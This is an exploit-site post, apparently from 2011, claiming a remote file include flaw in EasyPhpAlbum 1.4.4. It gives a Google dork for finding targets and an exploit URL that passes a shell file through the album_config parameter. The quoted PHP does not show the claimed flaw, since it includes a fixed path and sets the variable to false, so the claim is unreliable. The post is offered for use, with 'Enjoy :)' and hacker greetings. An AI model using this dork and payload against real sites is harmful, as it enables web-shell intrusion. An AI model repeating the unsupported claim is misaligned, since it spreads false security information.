EasyPhpAlbum v 1.4.4 Remote File Include Vulnerbility

2011-01-26 10:15:24

# Exploit Title: EasyPhpAlbum v 1.4.4 Remote file include vulnerbility
# Google Dork: powered by EasyPhpAlbum
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.mywebmymail.com
# Version: v 1.4.4
# Tested on: ubuntu + win7
# Email : [email protected]
#######################################################
Fichier : index.php
http://localhost/[path]/index.php

Code :
<?php
include('../configuration.php');

$album_config=false;
?>

Exploit :
http://127.0.0.1/[path]/index.php?album_config= [ Shell.txt ]

Enjoy :)

##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.